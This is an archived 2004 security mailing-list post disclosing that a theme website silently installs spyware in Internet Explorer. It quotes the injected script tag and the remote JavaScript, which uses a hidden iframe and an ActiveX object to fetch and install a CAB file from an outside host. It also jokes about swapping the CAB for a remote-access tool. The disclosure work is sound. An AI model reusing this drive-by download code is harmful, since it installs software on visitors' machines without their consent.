| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20041004101243.D69045@abate.veritynet.net>
From: gossi at abate.veritynet.net (Gossi The Dog)
Subject: Spyware installs with no interaction in IE on
fully patched XP SP2 box
Yes... ThemeXP.org has this in the HTML..
<!-- AUTO_PROMPT AD START --><script language="JavaScript"
type="text/JavaScript
"
src="http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js"></script>
<!-- AUTO_PROMPT AD END -->
Which calls...
http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
Which contains...
document.write('<iframe id="downloads_manager"
style="position:a
bsolute;visibility:hidden;"></iframe>');
document_code = '<html><head>\n';
document_code += '<\/head><body>\n';
document_code += '<object onerror="window.parent.retry();"
id="DDo
wnload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http:
//www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0
WIDTH=0><PARAM
NAME="AffiliateID"
VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n
';
document_code += '<\/body><\/html>';
downloads_manager.document.write(document_code);
downloads_manager.document.close();
setCookie('minpopup80wu03rd','test',1);
...which downloads http:
//www.addictivetechnologies.net/DM0/cab/ATPartners.cab
...which means those using shitty MS browsers get owned, again.
If you want a laugh, replace the CAB files which WinVNC or somesuch.
--g
Powered by blists - more mailing lists